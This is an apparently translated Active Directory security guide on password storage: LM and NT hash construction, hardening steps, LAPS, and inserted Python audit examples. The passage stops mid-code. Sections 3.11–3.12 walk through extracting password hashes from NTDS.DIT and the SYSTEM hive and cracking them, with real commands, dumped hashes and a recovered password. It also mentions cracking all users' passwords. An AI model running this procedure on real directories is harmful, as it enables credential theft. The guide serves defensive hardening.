No user account should have this option except service accounts. The following PowerShell command lists the accounts whose password never expires. It requires the Dell ActiveRoles Management Shell 1.6 PowerShell module and works with Windows 2003 and later domain controllers (free download: http://software.dell.com/fr-fr/trials/#a).

Start PowerShell and type the following commands:

Add-PSSnapin Quest.ActiveRoles.ADManagement
Get-QADUser -PasswordNeverExpires

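As an added example (not part of the original document, and independent of the Quest snap-in), the following Python applies the checks of sections 3.7 and 3.9 to constructed user records shaped like the LDAP attributes a real export contains: pwdLastSet is a FILETIME (100 ns ticks since 1601-01-01 UTC, 0 meaning "must change at next logon"), and the "password never expires" option is bit 0x10000 (DONT_EXPIRE_PASSWD) of userAccountControl. The account names and dates are invented for the illustration.

```python
"""Audit stale and never-expiring passwords from raw AD attributes (added example)."""
from datetime import datetime, timedelta, timezone

DONT_EXPIRE_PASSWD = 0x10000   # userAccountControl: "Password never expires"
ACCOUNTDISABLE = 0x0002        # userAccountControl: account disabled
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
_TICK = timedelta(microseconds=1)


def utc_datetime(*ymd) -> datetime:
    """Aware UTC datetime from (year, month, day[, hour, ...])."""
    return datetime(*ymd, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime.
    pwdLastSet = 0 means the user must change the password at next logon."""
    if ft <= 0:
        return None
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse conversion, used here only to build the sample records."""
    return ((dt - _EPOCH_1601) // _TICK) * 10


def audit_passwords(records, now: datetime, max_age_days: int = 365):
    """Return (stale, never_expires): names whose password is older than max_age_days,
    and enabled accounts flagged 'Password never expires'.
    Disabled accounts are skipped: they belong to a separate cleanup."""
    stale, never_expires = [], []
    for rec in records:
        uac = rec["userAccountControl"]
        if uac & ACCOUNTDISABLE:
            continue
        if uac & DONT_EXPIRE_PASSWD:
            never_expires.append(rec["sAMAccountName"])
        last_set = filetime_to_datetime(rec["pwdLastSet"])
        if last_set is not None and now - last_set > timedelta(days=max_age_days):
            stale.append(rec["sAMAccountName"])
    return stale, never_expires


# Constructed sample, not taken from a real directory.
SAMPLE_RECORDS = [
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x10200,     # normal + never expires
     "pwdLastSet": datetime_to_filetime(utc_datetime(2009, 3, 1))},
    {"sAMAccountName": "alice", "userAccountControl": 0x200,            # normal account
     "pwdLastSet": datetime_to_filetime(utc_datetime(2016, 12, 1))},
    {"sAMAccountName": "bob", "userAccountControl": 0x200,
     "pwdLastSet": 0},                                                   # must change at next logon
    {"sAMAccountName": "old_contractor", "userAccountControl": 0x10202,  # disabled + never expires
     "pwdLastSet": datetime_to_filetime(utc_datetime(2008, 6, 15))},
]

if __name__ == "__main__":
    stale, never = audit_passwords(SAMPLE_RECORDS, now=utc_datetime(2017, 1, 30))
    print("password older than 365 days:", stale)
    print("password never expires:", never)
```

On a real domain the records come from an LDAP export of sAMAccountName, userAccountControl and pwdLastSet; the logic is the same whatever tool produced the export.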


3.10 PASSWORD STORAGE IN ACTIVE DIRECTORY

3.10.1 WHAT IS A FINGERPRINT (OR HASH)?

For security reasons a user (or computer) account password must not be stored in clear text in an LDAP directory. Active Directory therefore stores the passwords of all computer and user accounts as a fingerprint (also called a hash). Two different passwords should not produce the same fingerprint, and the mathematical function that produces it is one-way: the original password cannot be computed back from its fingerprint. Rainbow tables work around this limitation by precomputing the fingerprint of every candidate password and storing the result in a compact database; an attacker then looks up the fingerprint he holds to find the matching password. See:

http://fr.wikipedia.org/wiki/Rainbow_table

Some fingerprint algorithms use a salt (also called a seed): a random value appended to the password before hashing. This reinforces short passwords and, above all, defeats precomputed tables, since with a salt two identical passwords do not produce the same fingerprint.

Active Directory can generate two kinds of fingerprint for a user or computer account password:

• The LM hash: very low security level (disabling it is mandatory).

• The NT hash: variable security level, depending on the complexity of the password.

Neither the LM hash nor the NT hash uses a salt.

3.10.2 THE LM HASH (LAN MANAGER HASH)

The LM hash is stored in the dBCSPwd attribute, and the password history in LM format in the lmPwdHistory attribute. Both attributes are protected by the operating system against read access through LDAP, even for a member of the Domain Admins group. In the example below the Active Directory is configured to store passwords in LM hash format.

After changing the password of the guillaume.mathieu account, the dBCSPwd attribute still shows as unavailable (displayed as Not set).

We will see later in this document that the content of the dBCSPwd and lmPwdHistory attributes can be recovered with the LIBESEDB and NTDSXtract tools, and that a website such as Objectif Sécurité (https://www.objectif-securite.ch/), which hosts an online rainbow table, can then return the user's password.

To generate the LM hash, the domain controller proceeds as follows:

1. The clear-text password is converted to the OEM (DOS) character set and truncated to 14 characters.
2. The password is converted to uppercase.
3. The password is padded with null characters up to 14 characters (14 bytes, 112 bits).
4. The result is split into two 7-byte (56-bit) blocks. In each block a 0 bit is inserted after every 7 bits, giving a 64-bit (8-byte) value that is used as a DES key (DES ignores these parity bits).
5. Each of the two DES keys encrypts the constant string "KGS!@#$%". The two 64-bit results are concatenated to obtain a 16-byte (128-bit) value: the LM hash.

To summarise: LM = DES(Password[0..6], "KGS!@#$%") || DES(Password[7..13], "KGS!@#$%")

The LM hash is very weak: it is case-insensitive, it only covers passwords of at most 14 characters, it has no salt, it relies on 56-bit DES keys, and its two halves are computed independently, so each half can be attacked on its own. If the password is shorter than 8 characters the second DES key is all zeros and the second half of the hash is the well-known constant AAD3B435B51404EE, which also reveals that the password is short. These five weaknesses make it possible to build a rainbow table (Philippe Oechslin's algorithm) of about 17 GB, instead of a 310 TB lookup table, that covers the LM hash of every possible password. Since Windows Server 2008, domain controllers no longer generate an LM hash by default when a password is changed. Many directories running Windows Server 2012 R2 nevertheless still contain LM hashes, because the password of some service accounts has not changed for 10 years or more!

3.10.3 THE NT HASH (NT LAN MANAGER HASH)

The NT hash is stored in the unicodePwd attribute, and the password history in NT format in the ntPwdHistory attribute. Both attributes are protected by the operating system against read access through LDAP, even for a member of the Domain Admins group.

The NT hash is a fingerprint of the password based on the MD4 hash function, without salt. To compute it the system:
• encodes the password in Unicode (UTF-16LE); it can contain up to 255 characters;
• applies MD4 to the result to obtain the NT hash.
To summarise: NT hash (NTLM hash) = MD4(Unicode password)

We will see in the next paragraph that the content of the unicodePwd and ntPwdHistory attributes can be recovered with the LIBESEDB and NTDSXtract tools, and therefore that the clear-text password can be recovered with a rainbow table, depending on the complexity of the password. The NT hash does not suffer from the design flaws of the LM hash. Although the algorithm uses no salt, the rainbow tables available for the NT hash generally only recover passwords of up to 8 characters unconditionally, and up to 16 characters under conditions (dictionary words, common patterns). A password stored as an NT hash can therefore be considered reasonably safe if it meets all of the following conditions:
• It mixes several character classes (lowercase, uppercase, special characters, digits).
• It is not built solely from a dictionary word and/or a sequence of digits. The password Vachette1 is in every MD4/NT hash rainbow table.
• It has at least 10 characters for standard users, 16 for VIP accounts and 24 for service accounts.

For more information:

https://www.sstic.org/media/SSTIC2007/SSTIC-actes/Secrets_d_authentification_sous_Windows/SSTIC2007-ArticleSecrets_d_authentification_sous_Windows-bordes.pdf



3.11 RECOVER A USER'S PASSWORD FROM THE LM HASH

3.11.1 THE PROCEDURE

This section shows how to take a copy of the directory database and export its tables with the LIBESEDB tool. The NTDSXtract tool then extracts the values of the unicodePwd, ntPwdHistory, dBCSPwd and lmPwdHistory attributes.

3.11.1.1 Get the NTDS.DIT and SYSTEM files

LIBESEDB needs the NTDS.DIT file (the Active Directory database) and the SYSTEM file (the registry hive behind HKEY_LOCAL_MACHINE\SYSTEM). The SYSTEM hive holds the boot key from which the password encryption key (PEK) that protects the hashes inside NTDS.DIT is derived, so both files are required. To obtain them you can create an IFM (Install From Media, the media used to promote a domain controller), take a snapshot of the Active Directory, or use a system state backup (restored to an alternate location).

To generate an IFM:
You need a Windows Server 2008 (or later) domain controller. Log on with a member of the Domain Admins group and type the following commands:

ntdsutil
activate instance ntds
ifm
create full c:\ifm

To back up the system state:

Use NTBACKUP on Windows 2003 domain controllers or Windows Server Backup on Windows 2008 and later.

3.11.1.2 Install a Linux machine

Install a Kali virtual machine (https://www.kali.org) under VMware Workstation 10 (in this example), connected to the corporate network. VMware ESXi, Hyper-V or VirtualBox also work.
Then install VMware Tools. You first need autoconf and the Linux kernel headers:
apt-get install autoconf
apt-get install linux-headers-$(uname -r)
In the VM menu click Install VMware Tools. This loads the VMware Tools ISO into the DVD drive of the virtual machine.

Copy the VMware Tools archive to a working directory:
cp /media/cdrom/VMwareTools-9.6.1-1378637.tar.gz /root/VMwareTools-9.6.1-1378637.tar.gz
Go to that directory:
cd /root/
Extract the archive:
tar xzf /root/VMwareTools-9.6.1-1378637.tar.gz
Go to the VMware Tools directory:
cd /root/vmware-tools-distrib
Start the installer script:
./vmware-install.pl
Accept the default answers (Enter key).
VMware Tools is now installed and the virtual DVD drive is unmounted automatically. Reboot.

It is not necessary to install GCC because it is already present on Kali.

3.11.1.3 Download and install LIBESEDB

LIBESEDB reads ESE (Extensible Storage Engine) databases; remember that the Active Directory database is an ESE database. Download LIBESEDB from:
https://github.com/libyal/libesedb/releases

For this article we download the file libesedb-experimental-20141110.

Log on to the Kali machine. Go to Applications | Accessories, then Terminal (as root). Go to the directory holding the TAR file and extract it:
tar -xvf libesedb-experimental-20141110.tar.gz
Go to the LIBESEDB directory (/root/libesedb-20141110) and configure the sources:
./configure
Then compile the program:
make
Once the compilation is complete, install the application:
make install
The shared library libesedb.so.1 then has to be registered with the dynamic linker, otherwise the following error appears:

esedbexport: error while loading shared libraries: libesedb.so.1: cannot open shared object file: No such file or directory

To register the library, type:

ldconfig

For more information: https://github.com/libyal/libesedb/wiki/Building

3.11.1.4 Download and install NTDSXtract

Download NTDSXtract from:

http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
Extract it (it unpacks into "/root/NTDSXtract 1.0") and rename the directory:
unzip /root/ntdsxtract_v1_0.zip
mv "/root/NTDSXtract 1.0/" /root/NTDSXTRACT

3.11.1.5 Recovering the LM hash

Copy the content of c:\ifm (ntds.dit and the SYSTEM hive) to the Kali machine; in this example ntds.dit is placed in /root/libesedb-20141110/. Go to the LIBESEDB directory and export the tables of the database:

cd /root/libesedb-20141110/
./esedbexport /root/libesedb-20141110/ntds.dit

The command should return the following:

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer2) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (hiddentable) out of 11.
Exporting table 6 (link_table) out of 11.
Exporting table 7 (quota_rebuild_progress_table) out of 11.
Exporting table 8 (quota_table) out of 11.
Exporting table 9 (sdpropcounttable) out of 11.
Exporting table 10 (sdproptable) out of 11.
Exporting table 11 (sd_table) out of 11.
Export completed.

esedbexport creates a directory named ntds.dit.export containing one file per table (sizes from the example database):

datatable.3 (9,616,462 bytes)
hiddentable.4 (693 bytes)
link_table.5 (6,563 bytes)
MSysObjects.0 (75,441 bytes)
MSysObjectsShadow.1 (75,441 bytes)
MSysUnicodeFixupVer2.2 (103 bytes)
quota_rebuild_progress_table.6 (80 bytes)
quota_table.7 (638 bytes)
sdpropcounttable.8 (14 bytes)
sdproptable.9 (96 bytes)
sd_table.10 (29,626 bytes)

Only datatable and link_table are needed by NTDSXtract.

We now use NTDSXtract to retrieve the LM hash. Copy the two exported tables and the SYSTEM hive into /root/NTDSXTRACT, then run dsusers.py:

cp /root/libesedb-20141110/ntds.dit.export/datatable.3 /root/NTDSXTRACT/datatable.3
cp /root/libesedb-20141110/ntds.dit.export/link_table.5 /root/NTDSXTRACT/link_table.5
cd /root/NTDSXTRACT
python ./dsusers.py datatable.3 link_table.5 --passwordhashes SYSTEM

The command returns the following:

Running with options:
  Extracting password hashes
Initialising engine...
Scanning database - 100% -> 3717 records processed
Searching for Schema object - 100% -> 12 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...
List of users:
==============
Record ID: 5768
User name: Guillaume Mathieu
User principal name: guillaume.mathieu@tphat.intra
SAM Account name: guillaume.mathieu
SAM Account Type: SAM_NORMAL_USER_ACCOUNT
GUID: 1eaee5d6-5f8f-4e8c-a840-31caddad6755
SID: S-1-5-21-2163606747-459301225-4249714960-1121
When created: 2013-08-05 08:12:08
When changed: 2013-08-17 18:20:58
Account expires: Never
Password last set: 2013-08-17 18:20:58.095203
Last logon: 2013-08-15 12:30:01.708144
Last logon timestamp: 2013-08-12 18:41:32.890748
Bad password time: 2013-08-15 12:29:32.988494
Logon count: 18
Bad password count: 0
User Account Control: NORMAL_ACCOUNT PWD Never Expires
Ancestors: $ROOT_OBJECT$ intra tphat Users Guillaume Mathieu
Password hashes:
Guillaume Mathieu:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu:11cb3f697332ae4c4a3b108f3fa6cb6d:::

The --passwordhistory option also dumps the LM and NT hashes of the password history:

python ./dsusers.py datatable.3 link_table.5 --passwordhashes SYSTEM --passwordhistory SYSTEM

The result is now:

Record ID: 5768
User name: Guillaume Mathieu
User principal name: guillaume.mathieu@tphat.intra
SAM Account name: guillaume.mathieu
SAM Account Type: SAM_NORMAL_USER_ACCOUNT
GUID: 1eaee5d6-5f8f-4e8c-a840-31caddad6755
SID: S-1-5-21-2163606747-459301225-4249714960-1121
When created: 2013-08-05 08:12:08
When changed: 2013-08-17 18:20:58
Account expires: Never
Password last set: 2013-08-17 18:20:58.095203
Last logon: 2013-08-15 12:30:01.708144
Last logon timestamp: 2013-08-12 18:41:32.890748
Bad password time: 2013-08-15 12:29:32.988494
Logon count: 18
Bad password count: 0
User Account Control: NORMAL_ACCOUNT PWD Never Expires
Ancestors: $ROOT_OBJECT$ intra tphat Users Guillaume Mathieu
Password hashes:
Guillaume Mathieu:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu:11cb3f697332ae4c4a3b108f3fa6cb6d:::
Password history:
Guillaume Mathieu_nthistory0:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu_nthistory1:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu_nthistory2:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu_nthistory3:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu_lmhistory0:11cb3f697332ae4c4a3b108f3fa6cb6d:::
Guillaume Mathieu_lmhistory1:11cb3f697332ae4c4a3b108f3fa6cb6d:::
Guillaume Mathieu_lmhistory2:99d1842dae7bad31a5615a0b1741a415:::
Guillaume Mathieu_lmhistory3:ce2f42bb6280ebf4b01331c7e77ec962:::

In this example the same hash appears several times in the history because the administrator reset the password to the same value from the Active Directory Users and Computers console (an administrative reset bypasses the history check).

3.11.1.6 Cracking the LM hash

Open the Objectif Sécurité website and submit the LM hash (http://www.objectif-securite.ch/ophcrack.php).
For the guillaume.mathieu account there are two Password hashes lines:
Password hashes:
Guillaume Mathieu:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu:11cb3f697332ae4c4a3b108f3fa6cb6d:::
The line prefixed with $NT$ is the NT hash. The second line is the LM hash.

Copy the LM hash in this form (11cb3f697332ae4c4a3b108f3fa6cb6d) to:

http://www.objectif-securite.ch/ophcrack.php

The password comes back in uppercase, since the LM hash does not preserve case. The website then uses the NT hash, if you also supply it, to work out which characters are uppercase.

The lm2ntcrack tool recovers the exact case in the same way: it tries every case variant of the uppercase password until the MD4 fingerprint matches the NT hash. Type the following command:

lm2ntcrack.exe -l="UPPERCASE_PASSWORD" -n="NTHASH"

http://www.xmco.fr/lm2ntcrack/lm2ntcrack-current_win32.zip

Bear in mind that submitting a hash to a third-party website discloses it: for real accounts use an offline tool such as ophcrack (see 3.12).
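The dsusers.py output is plain text, so the triage of a dump can be automated. As an added example that is not part of the original document, the following Python parses lines in the "account:$NT$hash:::" and "account:lmhash:::" formats shown above (history entries carry the _nthistoryN / _lmhistoryN suffix) and reports what a practitioner checks first: accounts that still have an LM hash, LM hashes whose second half is the all-zero-key constant AAD3B435B51404EE (password shorter than 8 characters), blank passwords (NT hash of the empty string), NT hashes shared between accounts (same password), and current hashes that already appear in the account's history (password reset to its previous value). The sample lines are constructed; apart from the two Guillaume Mathieu lines taken from the output above, only the hashes of "password" and of the empty string are real values, the others are placeholders.

```python
"""Triage of NTDSXtract (dsusers.py) password hash output (added example)."""
import re
from collections import defaultdict

EMPTY_LM_HALF = "aad3b435b51404ee"                # DES_K=0("KGS!@#$%"): password < 8 chars
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"      # MD4 of the empty string: blank password
_LINE = re.compile(r"^(?P<name>.+?)(?:_(?P<kind>nt|lm)history(?P<idx>\d+))?:"
                   r"(?P<nt>\$NT\$)?(?P<hash>[0-9a-fA-F]{32}):::$")

# Constructed sample output: "password" and empty-string hashes are genuine, the
# shortpw values are placeholders, account names other than the first are invented.
SAMPLE_OUTPUT = """\
Guillaume Mathieu:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu:11cb3f697332ae4c4a3b108f3fa6cb6d:::
Guillaume Mathieu_nthistory0:$NT$13b29964cc2480b4ef454c59562e675c:::
Guillaume Mathieu_lmhistory0:11cb3f697332ae4c4a3b108f3fa6cb6d:::
svc_legacy:$NT$8846f7eaee8fb117ad06bdd830b7586c:::
svc_legacy:e52cac67419a9a224a3b108f3fa6cb6d:::
svc_print:$NT$8846f7eaee8fb117ad06bdd830b7586c:::
shortpw:$NT$00000000000000000000000000000001:::
shortpw:0123456789abcdefaad3b435b51404ee:::
kiosk:$NT$31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_hashes(text: str) -> dict:
    """{account: {"nt": hex|None, "lm": hex|None, "nt_history": [...], "lm_history": [...]}}"""
    accounts = defaultdict(lambda: {"nt": None, "lm": None, "nt_history": [], "lm_history": []})
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue                       # progress messages, record attributes, blank lines
        kind = "nt" if m["nt"] else "lm"   # $NT$ prefix marks the NT hash, bare hex is LM
        digest = m["hash"].lower()
        entry = accounts[m["name"]]
        if m["kind"]:                      # history line, dsusers prints them in index order
            entry[f"{kind}_history"].append(digest)
        else:
            entry[kind] = digest
    return dict(accounts)


def triage(accounts: dict) -> dict:
    """Findings keyed by check name, each a sorted list of account names."""
    findings = defaultdict(set)
    by_nt = defaultdict(set)
    for name, e in accounts.items():
        if e["lm"] and e["lm"] != EMPTY_LM_HALF * 2:
            findings["lm_hash_present"].add(name)          # password <= 14 chars, trivially crackable
            if e["lm"][16:] == EMPTY_LM_HALF:
                findings["password_under_8_chars"].add(name)
        if e["nt"] == EMPTY_NT:
            findings["blank_password"].add(name)
        if e["nt"]:
            by_nt[e["nt"]].add(name)
            if e["nt"] in e["nt_history"]:
                findings["reset_to_previous_value"].add(name)
    for names in by_nt.values():
        if len(names) > 1:
            findings["shared_password"].update(names)      # same NT hash, same password
    return {check: sorted(names) for check, names in findings.items()}


if __name__ == "__main__":
    for check, names in triage(parse_hashes(SAMPLE_OUTPUT)).items():
        print(f"{check:26} {', '.join(names)}")
```

Feed it the real dsusers.py output instead of SAMPLE_OUTPUT to get the list of accounts to handle first in the password change campaign of section 3.7.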

3.11.2 HOW TO DISABLE THE LM HASH

Now that the dangers of the LM hash are understood, we will see:

• the prerequisites for disabling the LM hash;
• how to disable it.

3.11.2.1 What are the potential impacts?

Before disabling the LM hash, check the following:

• You have no machines running Windows 95/98 or Windows NT4 prior to SP3.
• You have no SAMBA servers prior to version 3.
• You have no Windows 2000 or Windows 2003 clusters.
• You have no Apple machines running Outlook 2001 in Exchange mode.

For Windows 2003 clusters (MSCS) a patch exists (KB 890761).
For Windows 2000 clusters you need at least SP3 (KB 272129). KB 828861 indicates that on Windows 2000 Server the password of the cluster service account must have at least 15 characters when the LM hash is disabled. See the following articles:

http://support.microsoft.com/kb/272129/en-us
http://support.microsoft.com/kb/299656/en-us
http://support.microsoft.com/kb/828861/en-us
http://support.microsoft.com/kb/890761/en-us
http://support.microsoft.com/kb/895092/en-us
http://www.markwilson.co.uk/blog/2004/06/problems-with-microsoft-clusters.htm
http://blogs.technet.com/b/askcore/archive/2011/08/11/windows-2003-server-cluster-and-accessdenied-errors.aspx

3.11.2.2 Procedure for disabling the LM hash

To disable the LM hash, apply one of the following two methods.

Method 1: change all passwords

Enable the policy Network security: Do not store LAN Manager hash value on next password change.
Start the gpmc.msc console. Edit the Default Domain Controllers Policy.
Go to Computer Configuration | Policies | Windows Settings | Security Settings | Local Policies | Security Options. Set Network security: Do not store LAN Manager hash value on next password change to Enabled.
Do the same in the Default Domain Policy.
Change the password of all user and computer accounts. You can force users to change their password by checking the box User must change password at next logon.

Service accounts can be reset to their current password value. Computer accounts change their password every 30 days by themselves, so simply wait. These actions remove the value of the dBCSPwd attribute.

To remove the values of lmPwdHistory (the password history in LM hash format), the password must be changed as many times as the password history length. This is not a problem for service accounts, since you know their password. For user accounts here is a trick: reset all user accounts with a default password, communicate this password to the users and check the box User must change password at next logon on each account. Users then change their password at their next logon.

A less ethical method is to recover all the passwords with the procedure of the previous paragraph and reset each account with the same value. Then check the box User must change password at next logon so that you no longer know any user's password.

Method 2: use passwords of 15 characters or more

Enable the policy Network security: Do not store LAN Manager hash value on next password change.
Start the gpmc.msc console. Edit the Default Domain Controllers Policy. Go to Computer Configuration | Policies | Windows Settings | Security Settings | Local Policies | Security Options. Set Network security: Do not store LAN Manager hash value on next password change to Enabled.
Do the same in the Default Domain Policy.
Set a password of 15 characters or more for all user accounts; no LM hash can be computed for such passwords. Computer accounts change their own password after 30 days. These actions remove the value of the dBCSPwd attribute.

To remove the values of lmPwdHistory, the password must again be changed as many times as the password history length.

The LM hash is disabled by default on Windows Server 2008 domain controllers (the behaviour when the policy Network security: Do not store LAN Manager hash value on next password change is not configured). This matters for migration projects from Windows 2000/2003 to Windows Server 2008 and later. For more information:

http://support.microsoft.com/kb/299656/en-us
http://support.microsoft.com/kb/946405/en-us

3.12 RECOVER A USER'S PASSWORD FROM THE NT HASH

3.12.1 THE PROCEDURE

The principle is exactly the same as for the LM hash: the LIBESEDB and NTDSXtract tools are used to recover the NT hash.
NTDSXtract produced the following line with the NT hash of the Guillaume MATHIEU account:
Guillaume Mathieu:$NT$13b29964cc2480b4ef454c59562e675c:::
Keep only the string after the $NT$ prefix and drop the trailing ":::", i.e.:
13b29964cc2480b4ef454c59562e675c
Submit this value to a website that hosts an MD4 rainbow table, such as:
https://crackstation.net
http://www.onlinehashcrack.com/

The password is displayed in clear text: P@ssword.

You can also use a tool such as Ophcrack (http://ophcrack.sourceforge.net) installed on a machine with 2 TB of disk space. The tool relies on a set of tables, some free and some paid. If you only use the free tables, 5.02 GB of free space is enough.

A video presentation of ophcrack is available at:
https://www.youtube.com/watch?v=x4WfTdlmwyY

Installation is very simple and automatically downloads 4 tables (Vista free, Vista probabilistic free, XP free and XP free small). The Vista num table has to be downloaded manually from
http://ophcrack.sourceforge.net/tables.php. The XP free and XP free small tables are meant for LM hashes, so we disable them.

Let us now test the tool. Open https://defuse.ca/checksums.htm, enter the password 14127487 and copy the resulting NT hash: b8895eced52341edfc6a078bb962cb3b.

Go to Load | Single hash. The input format is LMHASH:NTHASH. We assume the LM hash is disabled, so that field is left empty; enter:
:b8895eced52341edfc6a078bb962cb3b

Then click Crack. The password is found in under 5 seconds. Other free or commercial tools exist, such as:

http://project-rainbowcrack.com (1000 dollars)
https://www.freerainbowtables.com (free)

3.12.2 HOW TO PROTECT PASSWORDS

The NT hash is an unsalted MD4 fingerprint of the Unicode password. Although MD4 is much weaker than SHA-1 or more modern functions, the NT hash does not suffer from the design flaws of the LM hash. The MD4 rainbow tables available on the Internet (free or paid) generally recover passwords of fewer than 9 or 10 characters unconditionally, and up to 16 characters under conditions. To protect your passwords, adopt the following password policy:

• Minimum password length: 10 characters for standard users, 16 characters for sensitive users (VIPs, accounts with administrative privileges) and 24 characters for service accounts.
• Password complexity: enabled.
• Password history: enabled (5 passwords remembered).
• Maximum password age: 90 days.

A tool such as Hitachi ID Password Manager can help block passwords built on a dictionary word such as Vachette1 (which is in every rainbow table). A good practice is to test the strength of the passwords of sensitive accounts by checking that they are not in the rainbow tables: generate the NT hash and try to recover the password with ophcrack. Do this offline: computing the NT hash of a real password on a public website such as https://defuse.ca/checksums.htm hands that password to a third party.

You must also prevent an attacker from obtaining the NTDS.DIT and SYSTEM files of one of your read/write domain controllers. Both files can be obtained from a directory backup, an IFM (Install From Media), the theft of a physical domain controller or the copy of a virtual domain controller (snapshot). Encrypt the disks of your read/write domain controllers with BitLocker: an attacker can then no longer read the disk content with tools such as a LiveCD.

Deploy RODCs (read-only domain controllers) on sites that do not have a secure computer room. An RODC does not hold the password hashes of user and computer accounts (except for the accounts explicitly allowed by its password replication policy).

Finally, harden your directory so that an attacker cannot obtain administrative privileges such as Administrators, Domain Admins or Enterprise Admins, or backup rights (Backup Operators): with them he can take a backup of the directory or generate an IFM.



3.13 PROTECTING PASSWORDS STORED ON WINDOWS MACHINES

3.13.1 SERVICES AND SCHEDULED TASKS

Many passwords are also present on domain machines other than the domain controllers. In the example below the VMware Tools service was configured to run as the guillaume.mathieu account of the msreport.be domain. This account is a member of Domain Admins.

The password of the account used by a service or a scheduled task is stored as an LSA secret under the registry key HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. You can browse this key by logging on with a local administrator account and manually granting yourself permissions on HKEY_LOCAL_MACHINE\SECURITY.

Expanding the Secrets key shows a subkey for the VMware Tools service called _SC_VMTools. This key in turn contains 5 subkeys:

• CupdTime: date of the last password change.
• CurrVal: the current value of the password of the account configured for this service (here the password of guillaume.mathieu, a member of Domain Admins).
• OldVal: the previous value of the password of the VMware Tools service account.
• OupdTime: date of the previous update of the service configuration.
• SecDesc: detailed permissions.

When the service starts, the credentials of the account (NT hash, and LM hash if enabled) are also loaded into the memory of the lsass.exe process.

Tools such as Cain (http://www.oxid.it/cain.html) or NirLauncher (http://launcher.nirsoft.net) can recover these passwords by reading the memory of lsass.exe or the content of the registry entries under HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. Any local administrator of the machine can therefore recover the clear-text password of the service account, which is why services must never run under a Domain Admins account and should use a managed service account (MSA or gMSA, see above) whenever the application supports it.

In this example, the password of the guillaume.mathieu account is P@ssword.

3.13.2 CACHED WINDOWS LOGONS

How can you log on to a laptop when you are not connected to the corporate network and no domain controller is reachable? Why do you not get the error message below?

You can log on in the evening with your domain account because Windows caches a verifier of your login and password on the laptop, in the registry under the HKEY_LOCAL_MACHINE\SECURITY key.

On Windows 2003 (and Windows XP), the cached credential (MSCASH, also called DCC) is an MD4 hash of the user's NT hash concatenated with the lowercase user name, i.e.:
MSCASH = MD4(MD4(password) + username)

This protection is very weak, as explained in this article:

http://www.jedge.com/wordpress/windows-password-cache-mscache-mscash-v2/

Since Windows Vista and Windows 2008, the algorithm has changed (MSCASH2 format): the previous value is passed through PBKDF2 (PKCS #5) with the lowercase user name as salt and 10,240 iterations:
MSCASH2 = PBKDF2-HMAC-SHA1(MD4(MD4(password) + username), username, 10240)

The protection is much stronger, but the cache still allows an offline guessing attack against a weak password once the machine's disk is in an attacker's hands.

Read the articles below and disable logon caching on servers and fixed workstations (policy Interactive logon: Number of previous logons to cache set to 0). The feature can stay enabled on laptops running Windows Vista and later.

http://www.securiteam.com/tools/5JP0I2KFPA.html
http://www.jedge.com/wordpress/windows-password-cache-mscache-mscash-v2/



3.14 MANAGING YOUR LOCAL SAM BASIC MACHINE WITH MICROSOFT LAPS

It is important to set a different local administrator password on each machine company (servers and workstations). This can be done using the
Microsoft tool LAPS.

This solution is provided free by Microsoft and can be downloaded at the following address:
https://support.microsoft.com/en-us/kb/3062591 .

It replaces the solution provided by Microsoft through the Group Policy Preference which should no longer be used as a standard user can find
the password of the SAM database user account using the following procedure:

http://blogs.technet.com/b/askpfeplat/archive/2014/05/19/how-to-automate-changing-the-localadministrator-password.aspx

LAPS can automatically change the password of a local based administration account SAM on the domain member machines. A unique
password is generated for each machine and is stored in the attribute ms-Mcs-AdmPwd Account computer of the machine.

This attribute is said protected because it is necessary to have the right ExtendedRight in order to display the value of this attribute. Otherwise,
we see that empty attribute (for a standard user).

The solution on the client machines uses a DLL ( % ProgramFiles% \ LAPS \ SSC \ AdmPwd.dll )
extending Group Policy. The solution is based entirely on the engine group policies. The change of password is done when a machine applies
group policies (every 90 minutes + 0 to 30 minutes).

The solution manages the bultin administration account or another account. The solution allows to maintain a single user account of the
SAM database.

Once the solution is deployed, when a machine applies the GPO, it does the following:

• It checks if the password account administrator of the SAM database has expired by making a request on attribute ms-Mcs-AdmPwdExpirationTime
at his computer account.
• If the password has expired, it generates a new password for the administrator account of the local SAM database.

• She writes the value of the new password in the attribute ms-Mcs-AdmPwd and the expiration date of the new password in the attribute ms-Mcs-AdmPwdExpira
. The machine must therefore have the right to write the attribute but not to read the value of this attribute.

When the machine is offline, the solution does nothing because the CSE client detects that there is no connectivity with a domain controller. The
diagram below shows the view entire solution.

[Diagram: LAPS overview. Computer account in AD (attributes: Admin password, Expiration Time); Support staff; Active Directory; Managed
machine (GPO framework, AdmPwd.dll, scecli.dll).]
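The three steps above, simulated as an added example (not LAPS code and not from the original document): the directory is replaced by a constructed in-memory dictionary holding the two attributes, and the 14-character, four-class password policy is an assumption.

```python
"""
Simulation of the decision the LAPS client-side extension takes when a machine
applies Group Policy: check ms-Mcs-AdmPwdExpirationTime, and if the password has
expired, generate a new one and write both attributes back.
ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME (100-nanosecond ticks since
1601-01-01 UTC) stored as a decimal string, which the conversions below handle.
"""
import secrets
import string
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional

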